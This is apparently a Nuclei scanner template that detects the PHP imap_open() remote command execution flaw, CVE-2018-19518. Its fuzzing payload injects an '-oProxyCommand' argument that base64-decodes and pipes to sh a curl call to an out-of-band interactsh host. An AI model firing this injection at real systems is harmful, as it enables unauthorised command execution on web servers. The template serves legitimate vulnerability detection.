id: CVE-2018-19518 info: name: PHP imap - Remote Command Execution author: princechaddha severity: high description: | University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument. reference: - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518 - https://nvd.nist.gov/vuln/detail/CVE-2018-19518 - https://www.openwall.com/lists/oss-security/2018/11/22/3 - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.5 cve-id: CVE-2018-19518 cwe-id: CWE-88 metadata: confidence: tenative tags: imap,dast,vulhub,cve,cve2018,rce,oast,php http: - pre-condition: - type: dsl dsl: - 'method == "GET"' payloads: php-imap: - "x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}" fuzzing: - part: query fuzz: - "{{php-imap}}" matchers-condition: and matchers: - type: word part: interactsh_protocol words: - http - type: word part: interactsh_request words: - "User-Agent: curl" # digest: 4a0a00473045022100af7a090c8826b8f7eb0934a5a130dc05780441afce33b5e31dda44213d47691e02205499f8bad4923cabbddd841491363890751a97b823905e848b6ed457c4d2ecab:922c64590222798bb761d5b6d8e72950